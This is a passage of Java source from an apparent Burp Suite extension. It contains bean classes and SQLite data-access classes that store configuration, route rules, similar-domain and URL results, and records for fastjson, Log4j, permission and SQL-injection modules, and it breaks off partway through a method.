public void setValue(String value) {
this.value = value;
}
}
================================================
FILE: src/main/java/burp/bean/RouteBean.java
================================================
package burp.bean;
public class RouteBean {
private int id;
private int enable;
private String name;
private String path;
private String express;
public RouteBean() {
}
public RouteBean(int id, int enable, String name, String path, String express) {
this.id = id;
this.enable = enable;
this.name = name;
this.path = path;
this.express = express;
}
public int getId() {
return id;
}
public void setId(int id) {
this.id = id;
}
public int getEnable() {
return enable;
}
public void setEnable(int enable) {
this.enable = enable;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getPath() {
return path;
}
public void setPath(String path) {
this.path = path;
}
public String getExpress() {
return express;
}
public void setExpress(String express) {
this.express = express;
}
}
================================================
FILE: src/main/java/burp/bean/SimilarDomainConfigBean.java
================================================
package burp.bean;
public class SimilarDomainConfigBean {
private int id;
private int projectId;
private String domain;
private String createTime;
public SimilarDomainConfigBean() {
}
public SimilarDomainConfigBean(int projectId, String domain) {
this.projectId = projectId;
this.domain = domain;
}
public int getId() {
return id;
}
public void setId(int id) {
this.id = id;
}
public int getProjectId() {
return projectId;
}
public void setProjectId(int projectId) {
this.projectId = projectId;
}
public String getDomain() {
return domain;
}
public void setDomain(String domain) {
this.domain = domain;
}
public String getCreateTime() {
return createTime;
}
public void setCreateTime(String createTime) {
this.createTime = createTime;
}
}
================================================
FILE: src/main/java/burp/bean/SimilarDomainResultBean.java
================================================
package burp.bean;
public class SimilarDomainResultBean {
private int id;
private int projectId;
private String domain;
private String ip;
private String createTime;
public SimilarDomainResultBean() {
}
public SimilarDomainResultBean(int projectId, String domain, String ip) {
this.projectId = projectId;
this.domain = domain;
this.ip = ip;
}
public int getId() {
return id;
}
public void setId(int id) {
this.id = id;
}
public int getProjectId() {
return projectId;
}
public void setProjectId(int projectId) {
this.projectId = projectId;
}
public String getDomain() {
return domain;
}
public void setDomain(String domain) {
this.domain = domain;
}
public String getIp() {
return ip;
}
public void setIp(String ip) {
this.ip = ip;
}
public String getCreateTime() {
return createTime;
}
public void setCreateTime(String createTime) {
this.createTime = createTime;
}
}
================================================
FILE: src/main/java/burp/bean/SimilarProjectBean.java
================================================
package burp.bean;
public class SimilarProjectBean {
private int id;
private String name;
private String createTime;
public SimilarProjectBean() {
}
public SimilarProjectBean(String name) {
this.name = name;
}
public int getId() {
return id;
}
public void setId(int id) {
this.id = id;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getCreateTime() {
return createTime;
}
public void setCreateTime(String createTime) {
this.createTime = createTime;
}
}
================================================
FILE: src/main/java/burp/bean/SimilarUrlResultBean.java
================================================
package burp.bean;
public class SimilarUrlResultBean {
private int id;
private int projectId;
private String url;
private String createTime;
public SimilarUrlResultBean() {
}
public SimilarUrlResultBean(int projectId, String url) {
this.projectId = projectId;
this.url = url;
}
public int getId() {
return id;
}
public void setId(int id) {
this.id = id;
}
public int getProjectId() {
return projectId;
}
public void setProjectId(int projectId) {
this.projectId = projectId;
}
public String getUrl() {
return url;
}
public void setUrl(String url) {
this.url = url;
}
public String getCreateTime() {
return createTime;
}
public void setCreateTime(String createTime) {
this.createTime = createTime;
}
}
================================================
FILE: src/main/java/burp/bean/SqlBean.java
================================================
package burp.bean;
public class SqlBean {
private int id;
private String type;
private String value;
public SqlBean() {
}
public SqlBean(String type, String value) {
this.type = type;
this.value = value;
}
public int getId() {
return id;
}
public void setId(int id) {
this.id = id;
}
public String getType() {
return type;
}
public void setType(String type) {
this.type = type;
}
public String getValue() {
return value;
}
public void setValue(String value) {
this.value = value;
}
}
================================================
FILE: src/main/java/burp/dao/ConfigDao.java
================================================
package burp.dao;
import burp.bean.ConfigBean;
import burp.utils.DbUtils;
import burp.utils.Utils;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
public class ConfigDao {
// 根据模块和类型获取配置
public static ConfigBean getConfig(String module, String type) {
ConfigBean config = new ConfigBean();
String sql = "select value from config where module = ? and type = ? order by id desc limit 1";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
ResultSet resultSet = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, module);
ps.setString(2, type);
resultSet = ps.executeQuery();
while (resultSet.next()) {
config.setValue(resultSet.getString("value"));
}
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, resultSet);
}
return config;
}
// 删除配置
public static void deleteConfig(String type) {
String sql = "delete from config where type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, type);
ps.executeUpdate();
} catch (Exception e) {
e.printStackTrace();
} finally {
DbUtils.close(connection, ps, null);
}
}
// 根据id删除工具配置
public static void deleteToolConfig(String type) {
String sql = "delete from config where type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, type);
ps.executeUpdate();
} catch (Exception e) {
e.printStackTrace();
} finally {
DbUtils.close(connection, ps, null);
}
}
// 根据类型更新配置
public static void updateConfig(ConfigBean config) {
String sql = "update config set value = ? where type = ? and module = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, config.getValue());
ps.setString(2, config.getType());
ps.setString(3, config.getModule());
ps.executeUpdate();
} catch (Exception e) {
e.printStackTrace();
} finally {
DbUtils.close(connection, ps, null);
}
}
// 保存配置
public static void saveConfig(ConfigBean config) {
String sql = "INSERT OR REPLACE INTO config (module, type, value) VALUES (?, ?, ?)";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, config.getModule());
ps.setString(2, config.getType());
ps.setString(3, config.getValue());
ps.executeUpdate();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
// 获取工具配置
public static List<ConfigBean> getToolConfig() {
List<ConfigBean> configs = new ArrayList<>();
String sql = "select * from config where module = 'tool'";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
ResultSet resultSet = null;
try {
ps = connection.prepareStatement(sql);
resultSet = ps.executeQuery();
while (resultSet.next()) {
ConfigBean config = new ConfigBean();
config.setId(resultSet.getInt("id"));
config.setModule(resultSet.getString("module"));
config.setType(resultSet.getString("type"));
config.setValue(resultSet.getString("value"));
configs.add(config);
}
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, resultSet);
}
return configs;
}
}
================================================
FILE: src/main/java/burp/dao/FastjsonDao.java
================================================
package burp.dao;
import burp.bean.FastjsonBean;
import burp.utils.DbUtils;
import burp.utils.Utils;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
public class FastjsonDao {
public static List<FastjsonBean> getFastjsonListsByType(String type) {
List<FastjsonBean> fastjsons = new ArrayList<>();
String sql = "select * from fastjson where type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
ResultSet resultSet = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, type);
resultSet = ps.executeQuery();
while (resultSet.next()) {
FastjsonBean fastjson = new FastjsonBean();
fastjson.setId(resultSet.getInt("id"));
fastjson.setType(resultSet.getString("type"));
fastjson.setValue(resultSet.getString("url"));
fastjsons.add(fastjson);
}
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, resultSet);
}
return fastjsons;
}
}
================================================
FILE: src/main/java/burp/dao/Log4jDao.java
================================================
package burp.dao;
import burp.bean.Log4jBean;
import burp.utils.DbUtils;
import burp.utils.Utils;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
public class Log4jDao {
// 获取多个
public static List<Log4jBean> getLog4jListsByType(String type) {
String sql = "SELECT * FROM log4j WHERE type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
ResultSet rs = null;
List<Log4jBean> log4jBeans = new ArrayList<>();
try {
ps = connection.prepareStatement(sql);
ps.setString(1, type);
rs = ps.executeQuery();
while (rs.next()) {
Log4jBean log4jBean = new Log4jBean();
log4jBean.setId(rs.getInt("id"));
log4jBean.setType(rs.getString("type"));
log4jBean.setValue(rs.getString("value"));
log4jBeans.add(log4jBean);
}
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, rs);
}
return log4jBeans;
}
// 获取一个
public static Log4jBean getLog4jListByType(String type) {
String sql = "SELECT * FROM log4j WHERE type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
ResultSet rs = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, type);
rs = ps.executeQuery();
while (rs.next()) {
Log4jBean log4jBean = new Log4jBean();
log4jBean.setId(rs.getInt("id"));
log4jBean.setType(rs.getString("type"));
log4jBean.setValue(rs.getString("value"));
return log4jBean;
}
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, rs);
}
return null;
}
// 保存
public static void saveLog4j(Log4jBean log4jBean) {
String sql = "INSERT INTO log4j(type, value) VALUES(?, ?)";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, log4jBean.getType());
ps.setString(2, log4jBean.getValue());
ps.executeUpdate();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
// 更新
public static void updateLog4j(Log4jBean log4jBean) {
String sql = "UPDATE log4j SET value = ? WHERE type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, log4jBean.getValue());
ps.setString(2, log4jBean.getType());
ps.executeUpdate();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
// 删除
public static void deleteLog4jByType(String type) {
String sql = "DELETE FROM log4j WHERE type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, type);
ps.executeUpdate();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
}
================================================
FILE: src/main/java/burp/dao/PermDao.java
================================================
package burp.dao;
import burp.bean.PermBean;
import burp.utils.DbUtils;
import burp.utils.Utils;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
/**
* @Author Xm17
* @Date 2024-06-22 10:48
*/
public class PermDao {
// 保存
public static void savePerm(PermBean permBean){
String sql = "INSERT OR REPLACE INTO perm (type, value) VALUES (?, ?)";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, permBean.getType());
ps.setString(2, permBean.getValue());
ps.executeUpdate();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
// 更新
public static void updatePerm(PermBean permBean){
String sql = "update perm set value = ? where type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, permBean.getValue());
ps.setString(2, permBean.getType());
ps.executeUpdate();
} catch (Exception e) {
e.printStackTrace();
} finally {
DbUtils.close(connection, ps, null);
}
}
// 删除
public static void deletePerm(String type){
String sql = "delete from perm where type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, type);
ps.executeUpdate();
} catch (Exception e) {
e.printStackTrace();
} finally {
DbUtils.close(connection, ps, null);
}
}
// 查询一个
public static PermBean getPermListByType(String type) {
PermBean permBean = new PermBean();
String routesql = "select * from perm where type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
ResultSet resultSet = null;
try {
ps = connection.prepareStatement(routesql);
ps.setString(1, type);
resultSet = ps.executeQuery();
while (resultSet.next()) {
permBean.setId(resultSet.getInt("id"));
permBean.setType(resultSet.getString("type"));
permBean.setValue(resultSet.getString("value"));
}
} catch (Exception e) {
e.printStackTrace();
} finally {
DbUtils.close(connection, ps, null);
}
return permBean;
}
// 查询所有
public static List<PermBean> getPermListsByType(String type){
List<PermBean> permBeanLists = new ArrayList<>();
String routesql = "select * from perm where type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
ResultSet resultSet = null;
try {
ps = connection.prepareStatement(routesql);
ps.setString(1, type);
resultSet = ps.executeQuery();
while (resultSet.next()) {
PermBean permBean = new PermBean();
permBean.setId(resultSet.getInt("id"));
permBean.setType(resultSet.getString("type"));
permBean.setValue(resultSet.getString("value"));
permBeanLists.add(permBean);
}
} catch (Exception e) {
e.printStackTrace();
} finally {
DbUtils.close(connection, ps, null);
}
return permBeanLists;
}
}
================================================
FILE: src/main/java/burp/dao/RouteDao.java
================================================
package burp.dao;
import burp.bean.RouteBean;
import burp.bean.SqlBean;
import burp.utils.DbUtils;
import burp.utils.Utils;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
public class RouteDao {
// 获取所有规则
public static List<RouteBean> getRouteLists(){
String sql = "SELECT * FROM route";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
ResultSet rs = null;
List<RouteBean> routeBeans = new ArrayList<>();
try {
ps = connection.prepareStatement(sql);
rs = ps.executeQuery();
while (rs.next()){
RouteBean routeBean = new RouteBean();
routeBean.setEnable(rs.getInt("enable"));
routeBean.setName(rs.getString("name"));
routeBean.setPath(rs.getString("path"));
routeBean.setExpress(rs.getString("express"));
routeBeans.add(routeBean);
}
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, rs);
}
return routeBeans;
}
// 通过id修改规则
public static void updateRouteById(RouteBean routeBean){
String sql = "UPDATE route SET enable = ?, name = ?, path = ?, express = ? WHERE id = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setInt(1, routeBean.getEnable());
ps.setString(2, routeBean.getName());
ps.setString(3, routeBean.getPath());
ps.setString(4, routeBean.getExpress());
ps.setInt(5, routeBean.getId());
ps.executeUpdate();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
// 通过id修改enable
public static void updateRouteEnable(RouteBean routeBean){
String sql = "UPDATE route SET enable = ? WHERE name = ? and path = ? and express = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setInt(1, routeBean.getEnable());
ps.setString(2, routeBean.getName());
ps.setString(3, routeBean.getPath());
ps.setString(4, routeBean.getExpress());
ps.executeUpdate();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
// 删除
public static boolean deleteRoute(RouteBean routeBean){
String sql = "DELETE FROM route WHERE name = ? and path = ? and express = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, routeBean.getName());
ps.setString(2, routeBean.getPath());
ps.setString(3, routeBean.getExpress());
ps.executeUpdate();
return true;
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
return false;
} finally {
DbUtils.close(connection, ps, null);
}
}
// 添加规则
public static void addRoute(RouteBean routeBean){
String sql = "INSERT INTO route (enable, name, path, express) VALUES (?, ?, ?, ?)";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setInt(1, routeBean.getEnable());
ps.setString(2, routeBean.getName());
ps.setString(3, routeBean.getPath());
ps.setString(4, routeBean.getExpress());
ps.executeUpdate();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
}
================================================
FILE: src/main/java/burp/dao/SimilarDomainConfigDao.java
================================================
package burp.dao;
import burp.bean.*;
import burp.utils.DbUtils;
import burp.utils.Utils;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
public class SimilarDomainConfigDao {
// 保存域名配置
public static void saveDomainConfig(SimilarDomainConfigBean config) {
String sql = "INSERT INTO domain_configs (project_id, domain, create_time) VALUES (?, ?, datetime('now','localtime'))";
Connection connection = null;
PreparedStatement ps = null;
try {
connection = DbUtils.getConnection();
ps = connection.prepareStatement(sql);
ps.setInt(1, config.getProjectId());
ps.setString(2, config.getDomain());
ps.executeUpdate();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
// 批量保存域名配置
public static void saveDomainConfigs(int projectId, List<String> domains) {
Connection connection = null;
PreparedStatement ps = null;
try {
connection = DbUtils.getConnection();
connection.setAutoCommit(false);
// 先删除旧的配置
String deleteSql = "DELETE FROM domain_configs WHERE project_id = ?";
ps = connection.prepareStatement(deleteSql);
ps.setInt(1, projectId);
ps.executeUpdate();
// 插入新的配置
String insertSql = "INSERT INTO domain_configs (project_id, domain, create_time) VALUES (?, ?, datetime('now','localtime'))";
ps = connection.prepareStatement(insertSql);
for (String domain : domains) {
ps.setInt(1, projectId);
ps.setString(2, domain.trim());
ps.addBatch();
}
ps.executeBatch();
connection.commit();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
try {
if (connection != null) {
connection.rollback();
}
} catch (SQLException ex) {
Utils.stderr.println(ex.getMessage());
}
} finally {
try {
if (connection != null) {
connection.setAutoCommit(true);
}
} catch (SQLException e) {
Utils.stderr.println(e.getMessage());
}
DbUtils.close(connection, ps, null);
}
}
// 获取项目的域名配置
public static List<String> getDomainConfigs(int projectId) {
List<String> domains = new ArrayList<>();
String sql = "SELECT domain FROM domain_configs WHERE project_id = ?";
Connection connection = null;
PreparedStatement ps = null;
ResultSet rs = null;
try {
connection = DbUtils.getConnection();
ps = connection.prepareStatement(sql);
ps.setInt(1, projectId);
rs = ps.executeQuery();
while (rs.next()) {
domains.add(rs.getString("domain"));
}
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, rs);
}
return domains;
}
}
================================================
FILE: src/main/java/burp/dao/SimilarDomainResultDao.java
================================================
package burp.dao;
import burp.bean.SimilarDomainResultBean;
import burp.utils.DbUtils;
import burp.utils.Utils;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
public class SimilarDomainResultDao {
// 保存域名结果
public static int saveDomainResult(SimilarDomainResultBean result) {
Connection connection = null;
PreparedStatement ps = null;
ResultSet rs = null;
try {
connection = DbUtils.getConnection();
// 先检查是否存在相同记录
String checkSql = "SELECT id FROM domain_results WHERE project_id = ? AND domain = ?";
ps = connection.prepareStatement(checkSql);
ps.setInt(1, result.getProjectId());
ps.setString(2, result.getDomain());
rs = ps.executeQuery();
if (rs.next()) {
// 如果存在,更新IP和时间
int existingId = rs.getInt("id");
DbUtils.close(null, ps, rs); // 关闭旧的PreparedStatement和ResultSet
String updateSql = "UPDATE domain_results SET ip = ?, create_time = datetime('now','localtime') WHERE id = ?";
ps = connection.prepareStatement(updateSql);
ps.setString(1, result.getIp());
ps.setInt(2, existingId);
ps.executeUpdate();
return existingId;
} else {
// 不存在则插入新记录
DbUtils.close(null, ps, rs); // 关闭旧的PreparedStatement和ResultSet
String insertSql = "INSERT INTO domain_results (project_id, domain, ip, create_time) VALUES (?, ?, ?, datetime('now','localtime'))";
// 移除 Statement.RETURN_GENERATED_KEYS
ps = connection.prepareStatement(insertSql);
ps.setInt(1, result.getProjectId());
ps.setString(2, result.getDomain());
ps.setString(3, result.getIp());
ps.executeUpdate();
// 使用 last_insert_rowid() 获取最后插入的ID
ps = connection.prepareStatement("SELECT last_insert_rowid()");
rs = ps.executeQuery();
if (rs.next()) {
return rs.getInt(1);
}
}
return -1;
} catch (SQLException e) {
return -1;
} catch (Exception e) {
return -1;
} finally {
DbUtils.close(connection, ps, rs);
}
}
// 获取项目的域名结果
public static List<SimilarDomainResultBean> getDomainResults(int projectId) throws SQLException {
List<SimilarDomainResultBean> results = new ArrayList<>();
String sql = "SELECT id, project_id, domain, ip, create_time FROM domain_results WHERE project_id = ?";
Connection connection = null;
PreparedStatement ps = null;
ResultSet rs = null;
try {
connection = DbUtils.getConnection();
ps = connection.prepareStatement(sql);
ps.setInt(1, projectId);
rs = ps.executeQuery();
while (rs.next()) {
SimilarDomainResultBean bean = new SimilarDomainResultBean(
rs.getInt("project_id"),
rs.getString("domain"),
rs.getString("ip")
);
bean.setId(rs.getInt("id"));
bean.setCreateTime(rs.getString("create_time"));
results.add(bean);
}
return results;
} finally {
DbUtils.close(connection, ps, rs);
}
}
public static boolean isDomainExists(int id, String domain) {
String sql = "SELECT id FROM domain_results WHERE id = ? AND domain = ?";
try {
Connection connection = DbUtils.getConnection();
PreparedStatement ps = connection.prepareStatement(sql);
ps.setInt(1, id);
ps.setString(2, domain);
ResultSet rs = ps.executeQuery();
if (rs.next()) {
return true;
}
} catch (SQLException e) {
e.printStackTrace();
}
return false;
}
public static void updateDomainResult(SimilarDomainResultBean result) {
Connection connection = null;
PreparedStatement ps = null;
try {
connection = DbUtils.getConnection();
// 更新域名记录信息,包括IP和更新时间
String sql = "UPDATE similar_domain_results SET ip = ?, update_time = datetime('now','localtime') WHERE id = ?";
ps = connection.prepareStatement(sql);
ps.setString(1, result.getIp());
ps.setInt(2, result.getId());
int updatedRows = ps.executeUpdate();
if (updatedRows == 0) {
Utils.stderr.println("更新域名结果失败: 记录不存在 (ID: " + result.getId() + ")");
}
} catch (Exception e) {
Utils.stderr.println("更新域名结果失败: " + e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
}
================================================
FILE: src/main/java/burp/dao/SimilarProjectDao.java
================================================
package burp.dao;
import burp.bean.*;
import burp.utils.DbUtils;
import burp.utils.Utils;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.util.ArrayList;
import java.util.List;
public class SimilarProjectDao {
// 保存项目
public static void saveProject(SimilarProjectBean project) {
String sql = "INSERT INTO projects (name, create_time) VALUES (?, datetime('now','localtime'))";
Connection connection = null;
PreparedStatement ps = null;
try {
connection = DbUtils.getConnection();
ps = connection.prepareStatement(sql);
ps.setString(1, project.getName());
ps.executeUpdate();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
// 获取所有项目
public static List<SimilarProjectBean> getAllProjects() {
List<SimilarProjectBean> projects = new ArrayList<>();
String sql = "SELECT * FROM projects ORDER BY create_time DESC";
Connection connection = null;
PreparedStatement ps = null;
ResultSet rs = null;
try {
connection = DbUtils.getConnection();
ps = connection.prepareStatement(sql);
rs = ps.executeQuery();
while (rs.next()) {
SimilarProjectBean project = new SimilarProjectBean();
project.setId(rs.getInt("id"));
project.setName(rs.getString("name"));
project.setCreateTime(rs.getString("create_time"));
projects.add(project);
}
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, rs);
}
return projects;
}
// 删除项目
public static void deleteProject(int projectId) {
String sql = "DELETE FROM projects WHERE id = ?";
Connection connection = null;
PreparedStatement ps = null;
try {
connection = DbUtils.getConnection();
ps = connection.prepareStatement(sql);
ps.setInt(1, projectId);
ps.executeUpdate();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
}
================================================
FILE: src/main/java/burp/dao/SimilarUrlResultDao.java
================================================
package burp.dao;
import burp.bean.SimilarUrlResultBean;
import burp.utils.DbUtils;
import burp.utils.Utils;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;
public class SimilarUrlResultDao {
// 保存URL结果
public static int saveUrlResult(SimilarUrlResultBean result) {
Connection connection = null;
PreparedStatement ps = null;
ResultSet rs = null;
try {
connection = DbUtils.getConnection();
// 先检查是否存在相同记录
String checkSql = "SELECT id FROM url_results WHERE project_id = ? AND url = ?";
ps = connection.prepareStatement(checkSql);
ps.setInt(1, result.getProjectId());
ps.setString(2, result.getUrl());
rs = ps.executeQuery();
if (rs.next()) {
// 如果存在,更新时间
int existingId = rs.getInt("id");
DbUtils.close(null, ps, rs); // 关闭旧的PreparedStatement和ResultSet
String updateSql = "UPDATE url_results SET create_time = datetime('now','localtime') WHERE id = ?";
ps = connection.prepareStatement(updateSql);
ps.setInt(1, existingId);
ps.executeUpdate();
return existingId;
} else {
// 不存在则插入新记录
DbUtils.close(null, ps, rs); // 关闭旧的PreparedStatement和ResultSet
String insertSql = "INSERT INTO url_results (project_id, url, create_time) VALUES (?, ?, datetime('now','localtime'))";
ps = connection.prepareStatement(insertSql, Statement.RETURN_GENERATED_KEYS);
ps.setInt(1, result.getProjectId());
ps.setString(2, result.getUrl());
ps.executeUpdate();
// 获取新插入记录的ID
rs = ps.getGeneratedKeys();
if (rs.next()) {
return rs.getInt(1);
}
}
return -1;
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
return -1;
} finally {
DbUtils.close(connection, ps, rs);
}
}
// 获取项目的URL结果
public static List<SimilarUrlResultBean> getUrlResults(int projectId) {
Connection connection = null;
PreparedStatement ps = null;
ResultSet rs = null;
List<SimilarUrlResultBean> results = new ArrayList<>();
try {
connection = DbUtils.getConnection();
// 按创建时间降序排列,获取最新的记录
String sql = "SELECT id, project_id, url, create_time FROM url_results WHERE project_id = ? ORDER BY create_time DESC";
ps = connection.prepareStatement(sql);
ps.setInt(1, projectId);
rs = ps.executeQuery();
while (rs.next()) {
SimilarUrlResultBean result = new SimilarUrlResultBean();
result.setId(rs.getInt("id"));
result.setProjectId(rs.getInt("project_id"));
result.setUrl(rs.getString("url"));
result.setCreateTime(rs.getString("create_time"));
results.add(result);
}
return results;
} catch (Exception e) {
Utils.stderr.println("获取URL结果失败: " + e.getMessage());
return null;
} finally {
DbUtils.close(connection, ps, rs);
}
}
// 检查URL是否存在
public static boolean isUrlExists(int projectId, String url) {
Connection connection = null;
PreparedStatement ps = null;
ResultSet rs = null;
try {
connection = DbUtils.getConnection();
// 查询是否存在相同URL记录
String sql = "SELECT COUNT(*) as count FROM url_results WHERE project_id = ? AND url = ?";
ps = connection.prepareStatement(sql);
ps.setInt(1, projectId);
ps.setString(2, url);
rs = ps.executeQuery();
if (rs.next()) {
return rs.getInt("count") > 0;
}
return false;
} catch (Exception e) {
Utils.stderr.println("检查URL是否存在失败: " + e.getMessage());
return false;
} finally {
DbUtils.close(connection, ps, rs);
}
}
}
================================================
FILE: src/main/java/burp/dao/SqlDao.java
================================================
package burp.dao;
import burp.bean.SqlBean;
import burp.utils.DbUtils;
import burp.utils.Utils;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;
public class SqlDao {
// 保存
public static void saveSql(SqlBean sqlBean){
String sql = "INSERT OR REPLACE INTO sqli (type, value) VALUES (?, ?)";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, sqlBean.getType());
ps.setString(2, sqlBean.getValue());
ps.executeUpdate();
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
} finally {
DbUtils.close(connection, ps, null);
}
}
// 更新
public static void updateSql(SqlBean sqlBean){
String sql = "update sqli set value = ? where type = ?";
Connection connection = null;
try {
connection = DbUtils.getConnection();
} catch (SQLException e) {
throw new RuntimeException(e);
}
PreparedStatement ps = null;
try {
ps = connection.prepareStatement(sql);
ps.setString(1, sqlBean.getValue());
ps.setString(2, sqlBean.getType());
ps.executeUpdate();
} catch (Exception e) {
e.printStackTrace();
} finally {
